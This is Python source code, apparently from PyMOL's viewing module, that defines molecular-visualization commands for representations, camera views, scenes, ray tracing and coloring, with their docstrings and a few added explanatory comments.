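# an unrecognized name raises an error via repmasks_sc.auto_err (note added).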
def toggle(representation="lines", selection="all", *, _self=cmd):
'''
DESCRIPTION
"toggle" toggles the visibility of a representation within a
selection.
USAGE
toggle [ representation [, selection ]]
ARGUMENTS
representation = string: named representation {default: lines}
selection = string: atom selection {default: all}
NOTES
If the representation is enabled for any atom in the selection, it will
be turned off.
PYMOL API
cmd.toggle(string representation, string selection)
SEE ALSO
show, hide
'''
with _self.lockcm:
if representation == 'object':
repn = -2
else:
repn = _rep_to_repmask(representation)
# preprocess selection
selection = selector.process(selection)
r = _cmd.toggle(_self._COb,str(selection),int(repn));
return r
def _showhide(rep, selection, value, _self):
if not selection and (rep in ("", "all") or '(' in rep or '/' in rep):
# rep looks like a selection
selection = rep
rep = "wire" if value else "everything"
selection = selector.process(selection) or "all"
repn = _rep_to_repmask(rep)
with _self.lockcm:
r = _cmd.showhide(_self._COb, str(selection), int(repn), value)
return r
def show(representation="wire", selection="", *, _self=cmd):
'''
DESCRIPTION
"show" turns on representations for objects and selections.
USAGE
show [ representation [, selection ]]
ARGUMENTS
representation = lines, spheres, mesh, ribbon, cartoon, sticks,
dots, surface, labels, extent, nonbonded, nb_spheres, slice,
extent, slice, dashes, angles, dihedrals, cgo, cell, callback,
or everything
selection = string: a selection-expression or name-pattern
NOTES
With no arguments, "show" alone turns on lines for all bonds and
nonbonded for all atoms in all molecular objects.
EXAMPLES
show
show ribbon
show lines, (name CA+C+N)
SEE ALSO
hide, enable, disable
'''
return _showhide(representation, selection, 1, _self)
def show_as(representation="wire", selection="", *, _self=cmd):
'''
DESCRIPTION
"as" turns on and off atom and bond representations.
USAGE
as representation [, selection ]
ARGUMENTS
representation = lines, spheres, mesh, ribbon, cartoon, sticks,
dots, surface, labels, extent, nonbonded, nb_spheres, slice,
extent, slice, dashes, angles, dihedrals, cgo, cell, callback,
volume or everything
selection = string {default: all}
EXAMPLES
as lines, name CA+C+N
as ribbon
PYMOL API
cmd.show_as(string representation, string selection)
NOTES
"selection" can be an object name
"as" alone will turn on lines and nonbonded and hide everything else.
SEE ALSO
show, hide, enable, disable
'''
return _showhide(representation, selection, 2, _self)
def hide(representation="everything", selection="", *, _self=cmd):
'''
DESCRIPTION
"hide" turns off atom and bond representations.
USAGE
hide [ representation [, selection ]]
ARGUMENTS
representation = lines, spheres, mesh, ribbon, cartoon,
sticks, dots, surface, labels, extent, nonbonded, nb_spheres,
slice, extent, slice, dashes, angles, dihedrals, cgo, cell, callback,
or everything
selection = string: a selection-expression or name-pattern
EXAMPLES
hide lines, all
hide ribbon
PYMOL API
cmd.hide(string representation, string selection)
SEE ALSO
show, enable, disable
'''
return _showhide(representation, selection, 0, _self)
def get_view(output=1, quiet=1, *, _self=cmd):
'''
DESCRIPTION
"get_view" returns and optionally prints out the current view
information in a format which can be embedded into a command
script and can be used in subsequent calls to "set_view".
If a log file is currently open, get_view will not write the view
matrix to the screen unless the "output" parameter is 2.
USAGE
get_view [output]
ARGUMENTS
output = 0: output matrix to screen
    output = 1: do not output matrix to screen
output = 2: force output to screen even if log file is open
output = 3: return formatted string instead of a list
NOTES
Contents of the view matrix:
* 0 - 8: column-major 3x3 matrix which rotates model space to camera space
* 9 - 11: origin of rotation relative to camera (in camera space)
* 12 - 14: origin of rotation (in model space)
* 15: front plane distance from the camera
* 16: rear plane distance from the camera
* 17: orthoscopic flag (+/-) and field of view (if abs(value) > 1)
The camera always looks down -Z with its +X left and its +Y down.
Therefore, in the default view, model +X is to the observer\'s
right, +Y is upward, and +Z points toward the observer.
PYMOL API
cmd.get_view(output=1, quiet=1)
SEE ALSO
set_view
'''
with _self.lockcm:
r = _cmd.get_view(_self._COb)
if True:
output = int(output)
if True:
if (_self.get_setting_int("logging") != 0) and (output<3):
if not quiet:
print(" get_view: matrix written to log file.")
_self.log("_ set_view (\\\n","cmd.set_view((\\\n")
_self.log("_ %14.9f, %14.9f, %14.9f,\\\n"%r[0:3] ,
" %14.9f, %14.9f, %14.9f,\\\n"%r[0:3])
_self.log("_ %14.9f, %14.9f, %14.9f,\\\n"%r[4:7] ,
" %14.9f, %14.9f, %14.9f,\\\n"%r[4:7])
_self.log("_ %14.9f, %14.9f, %14.9f,\\\n"%r[8:11] ,
" %14.9f, %14.9f, %14.9f,\\\n"%r[8:11])
_self.log("_ %14.9f, %14.9f, %14.9f,\\\n"%r[16:19],
" %14.9f, %14.9f, %14.9f,\\\n"%r[16:19])
_self.log("_ %14.9f, %14.9f, %14.9f,\\\n"%r[19:22],
" %14.9f, %14.9f, %14.9f,\\\n"%r[19:22])
_self.log("_ %14.9f, %14.9f, %14.9f )\n"%r[22:25] ,
" %14.9f, %14.9f, %14.9f ))\n"%r[22:25])
if output<2: # suppress if we have a log file open
output=0
if output and (not quiet) and (output<3):
print("### cut below here and paste into script ###")
print("set_view (\\")
print(" %14.9f, %14.9f, %14.9f,\\"%r[0:3])
print(" %14.9f, %14.9f, %14.9f,\\"%r[4:7])
print(" %14.9f, %14.9f, %14.9f,\\"%r[8:11])
print(" %14.9f, %14.9f, %14.9f,\\"%r[16:19])
print(" %14.9f, %14.9f, %14.9f,\\"%r[19:22])
print(" %14.9f, %14.9f, %14.9f )"%r[22:25])
print("### cut above here and paste into script ###")
if output==3:
return ("set_view (\\\n"+
" %14.9f, %14.9f, %14.9f,\\\n"%r[0:3] +
" %14.9f, %14.9f, %14.9f,\\\n"%r[4:7] +
" %14.9f, %14.9f, %14.9f,\\\n"%r[8:11] +
" %14.9f, %14.9f, %14.9f,\\\n"%r[16:19] +
" %14.9f, %14.9f, %14.9f,\\\n"%r[19:22] +
" %14.9f, %14.9f, %14.9f )\n"%r[22:25])
r = r[0:3]+r[4:7]+r[8:11]+r[16:25]
return r
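# Layout of the 18-float sequence returned by get_view() and accepted by set_view()
# below (note added, summarizing the NOTES section above):
#   view[0:9]   rotation matrix mapping model space to camera space (column-major)
#   view[9:12]  origin of rotation relative to the camera (camera space)
#   view[12:15] origin of rotation (model space)
#   view[15]    front (near) clipping-plane distance from the camera
#   view[16]    rear (far) clipping-plane distance from the camera
#   view[17]    orthoscopic flag (sign) and field of view (if abs(value) > 1)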
def set_view(view,animate=0,quiet=1,hand=1, *, _self=cmd):
r'''
DESCRIPTION
"set_view" sets viewing information for the current scene,
including the rotation matrix, position, origin of rotation,
clipping planes, and the orthoscopic flag.
USAGE
set_view [ view ]
EXAMPLE
set_view (\
0.999876618, -0.000452542, -0.015699286,\
0.000446742, 0.999999821, -0.000372844,\
0.015699454, 0.000365782, 0.999876678,\
0.000000000, 0.000000000, -150.258514404,\
11.842411041, 20.648729324, 8.775371552,\
118.464958191, 182.052062988, 0.000000000 )
PYMOL API
cmd.set_view(string-or-sequence view)
SEE ALSO
get_view
'''
if isinstance(view, (str, bytes)):
view = safe_list_eval(view)
if len(view)!=18:
raise pymol.CmdException(
"bad view argument; should be a sequence of 18 floats")
with _self.lockcm:
r = _cmd.set_view(_self._COb,(
float(view[ 0]),float(view[ 1]),float(view[ 2]),0.0,
float(view[ 3]),float(view[ 4]),float(view[ 5]),0.0,
float(view[ 6]),float(view[ 7]),float(view[ 8]),0.0,
0.0,0.0,0.0,1.0,
float(view[ 9]),float(view[10]),float(view[11]),
float(view[12]),float(view[13]),float(view[14]),
float(view[15]),float(view[16]),float(view[17])),
int(quiet),float(animate),int(hand))
return r
def view(key, action='recall', animate=-1, *, _self=cmd):
'''
DESCRIPTION
"view" saves and restore camera views.
USAGE
view key [, action [, animate]]
ARGUMENTS
key = string or *
action = store, recall, clear: {default: recall}
NOTES
Views F1 through F12 are automatically bound to function keys
provided that "set_key" has not been used to redefine the
behaviour of the respective key, and that a "scene" has not been
defined for that key.
EXAMPLES
view 0, store
view 0
PYMOL API
cmd.view(string key, string action)
SEE ALSO
scene, set_view, get_view
'''
pymol=_self._pymol
if key=='*':
action = view_sc.auto_err(action,'action')
if action=='clear':
pymol._view_dict = {}
pymol._view_dict_sc = Shortcut(pymol._view_dict.keys())
else:
print(" view: stored views:")
lst = list(pymol._view_dict.keys())
lst.sort()
parsing.dump_str_list(lst)
else:
action = view_sc.auto_err(action,'action')
if action=='recall':
key = pymol._view_dict_sc.auto_err(key,'view')
_self.set_view(pymol._view_dict[key],animate=animate)
if _feedback(fb_module.scene,fb_mask.actions,_self): # redundant
print(" view: \"%s\" recalled."%key)
elif (action=='store') or (action=='update'):
pymol._view_dict_sc.append(key)
pymol._view_dict[key]=_self.get_view(0)
if _feedback(fb_module.scene,fb_mask.actions,_self):
print(" view: view "+action+"d as \"%s\"."%key)
elif action=='clear':
key = pymol._view_dict_sc.auto_err(key,'view')
if key in pymol._view_dict:
del pymol._view_dict[key]
pymol._view_dict_sc = Shortcut(pymol._view_dict.keys())
if _feedback(fb_module.scene,fb_mask.actions,_self): # redundant
print(" view: '%s' deleted."%key)
def get_viewport(output=1, quiet=1, *, _self=cmd):
'''
DESCRIPTION
"get_viewport" returns and optionally prints out the screen viewport size
USAGE
get_viewport [output]
ARGUMENTS
output = 0: do not print to screen
output = 1 {default}: print to screen if not logging and not quiet
output = 2: force output to screen even if log file is open
PYMOL API
cmd.get_viewport(output=1, quiet=1)
'''
output = int(output)
with _self.lockcm:
r = _cmd.get_viewport(_self._COb)
if _self.get_setting_int("logging") and output < 3:
_self.log(f"_ viewport {r[0]}, {r[1]}\n", f"cmd.viewport{r}\n")
if not quiet:
print(" get_viewport: data written to log file.")
if output < 2: # suppress if we have a log file open
output = 0
if (0 < output < 3) and not quiet:
print("### cut below here and paste into script ###")
print("viewport %4d, %4d" % r)
print("### cut above here and paste into script ###")
if output == 3:
colorprinting.warning(" Warning: get_viewport(3) is deprecated")
return "viewport ( %4d, %4d )\n" % r
return r
def get_vis(_self=cmd):
with _self.lockcm:
return _cmd.get_vis(_self._COb)
def set_vis(dict, *, _self=cmd):
with _self.lockcm:
return _cmd.set_vis(_self._COb, dict)
def get_colorection(key, *, _self=cmd):
with _self.lockcm:
return _cmd.get_colorection(_self._COb, key)
def set_colorection(dict,key, *, _self=cmd):
with _self.lockcm:
return _cmd.set_colorection(_self._COb, dict, key)
def del_colorection(dict,key, *, _self=cmd):
with _self.lockcm:
return _cmd.del_colorection(_self._COb, dict, key)
def get_scene_list(_self=cmd):
with _self.lockcm:
return _cmd.get_scene_order(_self._COb)
def get_scene_thumbnail(name, _self=cmd):
with _self.lockcm:
return _cmd.get_scene_thumbnail(_self._COb, name)
def get_scene_message(name, _self=cmd):
with _self.lockcm:
return _cmd.get_scene_message(_self._COb, name)
def set_scene_message(name, message, _self=cmd):
with _self.lockcm:
return _cmd.set_scene_message(_self._COb, name, message)
def chain_session(_self=cmd):
import os
# assumes locked interpreter
r = 0
session_file = str(_self.get("session_file"))
    re_pat = re.compile(r"[0-9]+\.")
if len(session_file): # find next session file, if it exists
mo = re_pat.search(session_file)
if mo is not None:
pat = mo.group(0)
if len(pat):
file_no = int(float(pat)) + 1
new_form = r"%0"+str(len(pat)-1)+"d."
for new_num in range(file_no, file_no+11):
new_pat = new_form % new_num
new_file = re_pat.sub(new_pat, session_file)
# try both PSE and PSW
if not os.path.exists(new_file):
new_file = re.sub("\.pse$",".psw",new_file,re.I)
if not os.path.exists(new_file):
new_file = re.sub("\.psw$",".pse",new_file,re.I)
if os.path.exists(new_file):
_self.do("_ cmd.load(r'''"+new_file+"''',format='psw')")
return 1
return 0
def scene_order(names,sort=0,location='current',quiet=1, *, _self=cmd):
'''
DESCRIPTION
"scene_order" changes the ordering of scenes.
USAGE
scene_order names, sort, location
ARGUMENTS
names = string: a space-separated list of names
sort = yes or no {default: no}
location = top, current, or bottom {default: current}
EXAMPLES
scene_order *,yes
scene_order F6 F4 F3
scene_order 003 006 004, location=top
# if names have spaces
cmd.scene_order(["name 1", "name 2"])
PYMOL API
cmd.scene_order(names: Union[list, str], sort: str, location: str)
SEE ALSO
scene
'''
location = location_sc.auto_err(location,'location')
if is_string(sort):
sort=boolean_dict[boolean_sc.auto_err(sort,'sort option')]
if isinstance(names, str):
names = names.split()
with _self.lockcm:
return _cmd.scene_order(_self._COb, names, sort, location)
def _scene_get_current_message(_self=cmd):
wiz = _self.get_wizard()
return '\n'.join(wiz.message) if (wiz is not None
and wiz.__class__.__name__ == 'Message'
and hasattr(wiz, 'from_scene')) else None
def scene_recall_message(message, *, _self=cmd):
'''
INTERNAL, DO NOT USE.
Display a scene message.
'''
wiz = _self.get_wizard()
replace_flag = (wiz is not None
and wiz.__class__.__name__ == 'Message'
and hasattr(wiz, 'from_scene'))
if message:
if is_string(message):
message = message.splitlines()
elif not is_list(message):
raise TypeError("message %s" % (type(message)))
wizard_func = _self.replace_wizard if replace_flag else _self.wizard
wizard_func("message", *message)
_self.get_wizard().from_scene = 1
elif replace_flag:
_self.wizard()
def scene(key='auto', action='recall', message=None, view=1,
color=1, active=1, rep=1, frame=1, animate=-1,
new_key=None, hand=1, quiet=1, sele="all", *, _self=cmd):
'''
DESCRIPTION
"scene" saves and restores scenes. A scene consists of the camera
view, all object activity information, all atom-wise visibilities,
all atom-wise colors, all representations, the global frame index,
and may contain a text message to display on playback.
USAGE
scene [key [,action [, message, [ new_key=new-key-value ]]]]
ARGUMENTS
key = string, new, auto, or *: use new for an automatically
numbered new scene, use auto for the current scene (if one
exists), and use * for all scenes (clear and recall actions only).
action = store, recall, insert_after, insert_before, next,
previous, update, rename, or clear: (default = recall). If
rename, then a new_key argument must be explicitly defined.
message = string: a text message to display with the scene.
new_key = string: the new name for the scene
EXAMPLES
scene *
scene F1, store
scene F2, store, Please note the critical hydrogen bond shown in yellow.
scene F1
scene F2
scene F1, rename, new_key=F5
NOTES
Scenes F1 through F12 are automatically bound to function keys
provided that "set_key" has not been used to redefine the behaviour
of the respective key.
SEE ALSO
view, set_view, get_view
'''
action = scene_action_sc.auto_err(action, 'action')
if is_list(message):
message = '\n'.join(message)
# default when called with no arguments
if key == 'auto':
if action == 'recall':
action = 'next'
# preserve message on update
if action == 'update':
if message is None:
message = _scene_get_current_message(_self)
# aliases (DEPRECATED)
if action == 'clear':
action = 'delete'
elif action == 'append' or action == 'update':
action = 'store'
# presentation auto quit
if (pymol._scene_quit_on_action == action and
action in ('next', 'previous') and
_self.get_setting_boolean("presentation") and
_self.get_setting_boolean("presentation_auto_quit") and
_self.get("scene_current_name") == ""):
if not chain_session(_self):
_self.quit()
# call C function
def func():
with _self.lockcm:
return _cmd.scene(_self._COb, key, action, message, int(view),
int(color),
int(active), int(rep), int(frame),
float(animate), new_key, int(hand), sele)
r = _self._call_with_opengl_context(func)
# for presentation auto quit
pymol._scene_quit_on_action = action
return r
def _legacy_scene(key='auto', action='recall', message=None, view=1,
color=1, active=1, rep=1, frame=1, animate=-1,
new_key=None, hand=1, quiet=1, *, _self=cmd):
''' FOR INTERNAL USE ONLY. Stores and deletes <=1.7.4 compatible scenes. '''
pymol=_self._pymol
view = int(view)
rep = int(rep)
color = int(color)
active = int(active)
frame = int(frame)
quiet = int(quiet)
animate = 0
with _self.lockcm:
if key=='*':
if action=='clear':
for key in pymol._scene_dict:
# free selections
scene_list = pymol._scene_dict[key]
if len(scene_list)>3:
colorection = scene_list[3]
if colorection is not None:
_self.del_colorection(colorection,key)
name = "_scene_"+key+"_*"
_self.delete(name)
else:
raise ValueError('action=' + action)
else:
if action == 'store':
if key in ('new', 'auto'):
raise ValueError('key=' + key)
if key in pymol._scene_dict:
raise RuntimeError('update not supported')
if rep:
for rep_name in rep_list:
name = "_scene_"+key+"_"+rep_name
_self.select(name,"rep "+rep_name)
if is_string(message):
if message:
if (message[0:1] in [ '"',"'"] and
message[-1:] in [ '"',"'"]):
message=message[1:-1]
else:
message = message.splitlines()
pymol._scene_dict[key] = [
_self.get_view(0) if view else None,
_self.get_vis() if active else None,
_self.get_frame() if frame else None,
_self.get_colorection(key) if color else None,
1 if rep else None,
message,
]
else:
raise ValueError('action=' + action)
def session_save_views(session, *, _self=cmd):
pymol=_self._pymol
session['view_dict']=copy.deepcopy(pymol._view_dict)
return 1
def session_restore_views(session, *, _self=cmd):
pymol=_self._pymol
if 'view_dict' in session:
pymol._view_dict=copy.deepcopy(session['view_dict'])
pymol._view_dict_sc.rebuild(list(pymol._view_dict.keys()))
return 1
def session_restore_scenes(session, *, _self=cmd):
# Restore scenes from old session files (<= 1.7.4)
if 'scene_dict' in session:
_self.scene('*', 'clear')
# save initial scene
tempname = '_initial_scene'
while tempname in session['scene_dict']:
tempname += '_'
_self.scene(tempname, 'store')
frame = 0
if _self.get_movie_playing():
_self.mstop()
frame = _self.get_frame()
for key, data in list(session['scene_dict'].items()):
_convert_legacy_scene(key, data, _self)
if frame:
_self.frame(frame)
_self.mplay()
# restore initial scene
_self.scene(tempname, 'recall', animate=0)
_self.scene(tempname, 'clear')
if 'scene_order' in session:
_self.scene_order(' '.join(session['scene_order']))
return 1
def _convert_legacy_scene(key, scene_list, _self=cmd):
# Create a scene from the given legacy scene list and finally delete
# the colorection and rep selections.
scene_list += [None] * 5
view, active, frame, color, rep = [(0 if x is None else 1)
for x in scene_list[:5]]
if frame:
_self.frame(scene_list[2])
if view:
_self.set_view(scene_list[0], 0.0)
if active:
_self.disable()
_self.deselect()
_self.set_vis(scene_list[1])
if color:
_self.set_colorection(scene_list[3], key)
_self.del_colorection(scene_list[3], key)
if rep:
# only atomic representations
_self.hide('everything', '(*)')
sele_prefix = _self.get_legal_name('_scene_' + key + '_')
for rep_name in rep_list:
_self.show(rep_name, "?" + sele_prefix + rep_name)
_self.delete(sele_prefix + "*")
_self.scene(key, 'store', scene_list[5], view, color, active, rep, frame)
def stereo(toggle='on', quiet=1, *, _self=cmd):
'''
DESCRIPTION
"stereo" activates or deactives stereo mode.
USAGE
stereo [toggle]
ARGUMENTS
toggle = on, off, crosseye, walleye, quadbuffer, sidebyside, geowall, or openvr
EXAMPLES
stereo on
stereo off
stereo crosseye
NOTES
"quadbuffer" is the default stereo mode if hardware stereo is available.
otherwise, "crosseye" is the default.
PYMOL API
cmd.stereo(string toggle)
'''
toggle = stereo_dict[stereo_sc.auto_err(str(toggle),'toggle')]
with _self.lockcm:
return _cmd.stereo(_self._COb, toggle)
def turn(axis, angle, *, _self=cmd):
'''
DESCRIPTION
"turn" rotates the camera about one of the three primary axes,
centered at the origin.
USAGE
turn axis, angle
EXAMPLES
turn x, 90
turn y, 45
PYMOL API
cmd.turn(string axis, float angle)
SEE ALSO
move, rotate, translate, zoom, center, clip
'''
with _self.lockcm:
r = _cmd.turn(_self._COb,str(axis),float(angle))
return r
def full_screen(toggle=-1, *, _self=cmd):
'''
DESCRIPTION
"full_screen" enables or disables full screen mode.
USAGE
full_screen [toggle]
EXAMPLES
full_screen
full_screen on
full_screen off
NOTES
This does not work correctly on all platforms. If you encounter
trouble, try using the maximize button on the viewer window
instead.
'''
toggle = toggle_dict[toggle_sc.auto_err(str(toggle),'toggle')]
with _self.lockcm:
if _self.is_gui_thread():
return _cmd.full_screen(_self._COb,int(toggle))
return _self._do("full_screen %s" % (toggle), echo=0)
def rock(mode=-1, *, _self=cmd):
'''
DESCRIPTION
"rock" toggles Y axis rocking.
USAGE
rock
PYMOL API
cmd.rock()
'''
with _self.lockcm:
r = _cmd.rock(_self._COb,int(mode))
return r
def label(selection="(all)", expression="", quiet=1, *, _self=cmd):
'''
DESCRIPTION
"label" labels one or more atoms in a selection by evaluating an
Python expression referencing properties for each atom.
USAGE
label [ selection [, expression ]]
ARGUMENTS
selection = string: a selection-expression
expression = string: a Python expression that can be converted to a string
EXAMPLES
label chain A, chain
label name CA,"%s-%s" % (resn,resi)
label resi 200,"%1.3f" % partial_charge
NOTES
The symbols defined in the label name space for each atom are:
name, resi, resn, resv, chain, segi, model, alt, q, b, type,
index, rank, ID, ss, vdw, elec_radius, label, elem, geom,
flags, color, cartoon, valence, formal_charge, partial_charge,
numeric_type, text_type, stereo
All strings in the expression must be explicitly quoted.
This operation typically takes several seconds per thousand atoms
labelled.
To clear labels, simply omit the expression or set it to ''.
'''
# preprocess selection
selection = selector.process(selection)
#
with _self.lockcm:
return _cmd.label(_self._COb, selection, expression, quiet)
def label2(selection="(all)", expression="", quiet=1, *, _self=cmd):
# preprocess selection
selection = selector.process(selection)
#
with _self.lockcm:
return _cmd.label2(_self._COb, selection, expression, quiet)
def window(action='show', x=0, y=0, width=0, height=0, *, _self=cmd):
'''
DESCRIPTION
"window" controls the visibility of PyMOL\'s output window
USAGE
window [ action [, x [, y [, width [, height ]]]]]
PYMOL API
cmd.window(string action, int x, int y, int width, int height)
'''
action = window_sc.auto_err(action,'action')
action = window_dict[str(action)]
with _self.lockcm:
from pymol.gui import get_qtwindow as getPyMOLWindow
qt_window = getPyMOLWindow()
if qt_window:
r = DEFAULT_SUCCESS
qt_window.window_cmd(action, int(x),int(y),int(width),int(height))
else:
r = _cmd.window(_self._COb,action,int(x),int(y),int(width),int(height))
return r
def viewport(width=-1,height=-1, *, _self=cmd):
'''
DESCRIPTION
"viewport" changes the size of the graphics display area.
USAGE
viewport width, height
PYMOL API
cmd.viewport(int width, int height)
'''
if cmd.is_string(width) and height == -1:
width = _self.safe_eval(width)
if _self.is_sequence(width):
colorprinting.warning(" Warning: Tuple-syntax (parentheses) "
"for viewport is deprecated")
width, height = width
if not cmd.is_gui_thread():
_self.do("viewport %d,%d"%(int(width),int(height)),0)
return None
with _self.lockcm:
return _cmd.viewport(_self._COb, int(width), int(height))
def bg_color(color="black", *, _self=cmd):
'''
DESCRIPTION
"bg_color" sets the background color.
USAGE
bg_color [ color ]
ARGUMENTS
color = string: color name or number {default: black}
EXAMPLES
bg_color grey30
bg_color
NOTES
To obtain a transparent background, "unset opaque_background", and
then use "ray".
SEE ALSO
set_color, ray
PYMOL API
cmd.bg_color(string color)
'''
color = _self._interpret_color(_self,color)
with _self.lockcm:
r = _cmd.bg_color(_self._COb,str(color))
return r
cartoon_dict = {
'skip' : -1,
'automatic' : 0,
'loop' : 1,
'rectangle' : 2,
'oval' : 3,
'tube' : 4,
'arrow' : 5,
'dumbbell' : 6,
'putty' : 7,
'dash' : 8,
'cylinder' : 9,
}
cartoon_sc = Shortcut(cartoon_dict.keys())
def cartoon(type, selection="(all)", *, _self=cmd):
'''
DESCRIPTION
"cartoon" changes the default cartoon representation for a set of atoms.
USAGE
cartoon type, selection
ARGUMENTS
type = automatic, skip, loop, rectangle, oval, tube, arrow, dumbbell
PYMOL API
cmd.cartoon(string type, string selection)
EXAMPLES
cartoon rectangle, chain A
cartoon skip, resi 145-156
NOTES
This command is rarely required since the default "automatic" mode
chooses cartoons according to the information in the PDB HELIX and
SHEET records.
'''
# preprocess selection
selection = selector.process(selection)
#
type = cartoon_dict[cartoon_sc.auto_err(str(type),'type')];
with _self.lockcm:
return _cmd.cartoon(_self._COb, selection, int(type))
def _ray(width,height,antialias,angle,shift,renderer,quiet,_self=cmd):
r = DEFAULT_ERROR
try:
_self.lock_without_glut()
try:
_cmd.set_busy(_self._COb,1)
r = _cmd.render(_self._COb,int(width),int(height),
int(antialias),
float(angle),
float(shift),int(renderer),
int(quiet))
finally:
_cmd.set_busy(_self._COb,0)
finally:
_self.unlock(r)
return r
def capture(quiet=1, *, _self=cmd):
_self.draw(antialias=-2,quiet=quiet)
def draw(width=0, height=0, antialias=-1, quiet=1, *, _self=cmd):
'''
DESCRIPTION
"draw" creates an OpenGL-based image of the current frame.
USAGE
draw [width [,height [,antialias ]]]
ARGUMENTS
width = integer {default: 0 (current)}
height = integer {default: 0 (current)}
antialias = integer {default: -1 (use antialias setting)}
EXAMPLES
draw
draw 1600
NOTES
Default width and height are taken from the current viewpoint. If
one is specified but not the other, then the missing value is
scaled so as to preserve the current aspect ratio.
Because this feature uses the OpenGL rendering context to piece
together the image, it does not work when running in the
command-line only mode.
On certain graphics hardware, "unset opaque_background" followed
by "draw" will produce an image with a transparent background.
However, better results can usually be obtained using "ray".
PYMOL API
cmd.draw(int width, int height, int antialias, int quiet)
SEE ALSO
ray, png, save
'''
# stop movies and sculpting if they're on...
if _self.get_movie_playing():
_self.mstop()
if _self.get_setting_boolean("sculpting"):
_self.set("sculpting","off",quiet=1)
#
def func():
with _self.lockcm:
# make sure that there aren't any pending display events
# TODO could this be fixed with PYMOL-3328 (SceneUpdate)?
_cmd.refresh_now(_self._COb)
return _cmd.draw(_self._COb,int(width),int(height),
int(antialias),int(quiet))
return _self._call_with_opengl_context(func)
def ray(width=0, height=0, antialias=-1, angle=0.0, shift=0.0,
renderer=-1, quiet=1, async_=0, _self=cmd, **kwargs):
'''
DESCRIPTION
"ray" creates a ray-traced image of the current frame. This
can take some time (up to several minutes, depending on image
complexity).
USAGE
ray [width [,height [,antialias [,angle [,shift [,renderer [,quiet
[,async ]]]]]]]]]
ARGUMENTS
width = integer {default: 0 (current)}
height = integer {default: 0 (current)}
antialias = integer {default: -1 (use antialias setting)}
angle = float: y-axis rotation for stereo image generation
{default: 0.0}
shift = float: x-axis translation for stereo image generation
{default: 0.0}
renderer = -1, 0, 1, or 2: respectively, default, built-in,
pov-ray, or dry-run {default: -1}
async = 0 or 1: should rendering be done in a background thread?
EXAMPLES
ray
ray 1024,768
ray renderer=2
NOTES
Default width and height are taken from the current viewpoint. If
one is specified but not the other, then the missing value is
scaled so as to preserve the current aspect ratio.
angle and shift can be used to generate matched stereo pairs
renderer = 1 uses PovRay. This is Unix-only and you must have
"povray" in your path. It utilizes two temporary files:
"tmp_pymol.pov" and "tmp_pymol.png".
See "help faster" for optimization tips with the builtin renderer.
See "help povray" for how to use PovRay instead of PyMOL\'s
built-in ray-tracing engine.
PYMOL API
cmd.ray(int width, int height, int antialias, float angle,
float shift, int renderer, int quiet, int async)
SEE ALSO
draw, png, save
'''
async_ = int(kwargs.pop('async', async_))
if kwargs:
raise pymol.CmdException('unknown argument: ' + ', '.join(kwargs))
arg_tup = (int(width),int(height),
int(antialias),float(angle),
float(shift),int(renderer),int(quiet),_self)
# stop movies, rocking, and sculpting if they're on...
if _self.get_movie_playing():
_self.mstop()
if _self.get_setting_boolean("sculpting"):
_self.set("sculpting","off",quiet=1)
if _self.rock(-2)>0:
_self.rock(0)
#
if not async_:
r = _ray(*arg_tup)
else:
render_thread = threading.Thread(target=_ray, args=arg_tup)
render_thread.daemon = True
render_thread.start()
r = DEFAULT_SUCCESS
return r
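# Illustrative usage sketch (not part of the original module): render in a background
# thread so the interpreter stays responsive; assumes cmd.sync() is available to wait
# for the renderer to finish before saving:
#     cmd.ray(1024, 768, async_=1)
#     cmd.sync()
#     cmd.png('frame.png')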
def refresh(_self=cmd):
'''
DESCRIPTION
"refresh" causes the scene to be redrawn as soon as the operating
system allows it to be done.
USAGE
refresh
PYMOL API
cmd.refresh()
SEE ALSO
rebuild
'''
if _self.is_gui_thread():
return _self._refresh()
with _self.lockcm:
return _self._do("_ cmd._refresh()")
def reset(object='', *, _self=cmd):
'''
DESCRIPTION
"reset" restores the rotation matrix to identity, sets the origin
to the center of mass (approx.) and zooms the window and clipping
planes to cover all objects. Alternatively, it can reset object
matrices.
USAGE
reset [ object ]
PYMOL API
cmd.reset()
'''
with _self.lockcm:
return _cmd.reset(_self._COb, str(object))
def dirty(_self=cmd): # OBSOLETE?
with _self.lockcm:
r = _cmd.dirty(_self._COb)
return r
def meter_reset(_self=cmd):
'''
DESCRIPTION
"meter_reset" resets the frames per secound counter.
USAGE
meter_reset
'''
with _self.lockcm:
r = _cmd.reset_rate(_self._COb)
return r
def load_png(filename, movie=1, stereo=-1, quiet=0, *, _self=cmd):
'''
DESCRIPTION
"load_png" loads and displays a PNG file from disk.
USAGE
load_png filename
NOTES
If the displayed image is too big for the window, it will be
reduced 2-fold repeatedly until it fits.
'''
filename = _self.exp_path(str(filename))
with _self.lockcm:
return _cmd.load_png(_self._COb, filename, int(movie), int(stereo),
int(quiet))
def rebuild(selection='all',representation='everything', *, _self=cmd):
'''
DESCRIPTION
"rebuild" forces PyMOL to recreate geometric objects in
case any of them have gone out of sync.
USAGE
rebuild [selection [, representation ]]
ARGUMENTS
selection = string {default: all}
representation = string: {default: everything}
PYMOL API
cmd.rebuild(string selection, string representation)
SEE ALSO
refresh
'''
selection = selector.process(selection)
representation = repres_sc.auto_err(representation,'representation')
repn = repres[representation]
with _self.lockcm:
return _cmd.rebuild(_self._COb, selection, repn)
def recolor(selection='all', representation='everything', *, _self=cmd):
'''
DESCRIPTION
"recolor" forces reapplication of colors to existing objects.
USAGE
recolor [selection [, representation ]]
ARGUMENTS
selection = string {default: all}
representation = string {default: everything}
NOTES
This command often needs to be executed after "set_color" has been
used to redefine one or more existing colors.
PYMOL API
cmd.recolor(string selection = 'all', string representation = 'everything')
SEE ALSO
color, set_color
'''
selection = selector.process(selection)
representation = repres_sc.auto_err(representation,'representation')
repn = repres[representation]
with _self.lockcm:
return _cmd.recolor(_self._COb, selection, repn)
def color(color, selection="(all)", quiet=1, flags=0, *, _self=cmd):
'''
DESCRIPTION
"color" changes the color of objects or atoms.
USAGE
color color [, selection ]
ARGUMENTS
color = string: color name or number
selection = string: selection-expression or name-pattern
corresponding to the atoms or objects to be colored
{default: (all)}.
NOTES
When using color ramps, the ramp can be used as a color.
PYMOL API
cmd.color(string color, string selection, int quiet)
SEE ALSO
color_deep, set_color, recolor
EXAMPLE
color cyan
color yellow, chain A
'''
# preprocess selection
selection = selector.process(selection)
color = _self._interpret_color(_self,str(color))
with _self.lockcm:
return _cmd.color(_self._COb, str(color), str(selection),
int(flags), int(quiet))
def color_deep(color, name='all', quiet=1, *, _self=cmd):
'''
DESCRIPTION
Unset all object and atom level (not global) color settings and
apply given color.
ARGUMENTS
color = str: color name or number
name = str: object name or pattern {default: all}
SEE ALSO
color, unset_deep
'''
from pymol.menu import rep_setting_lists
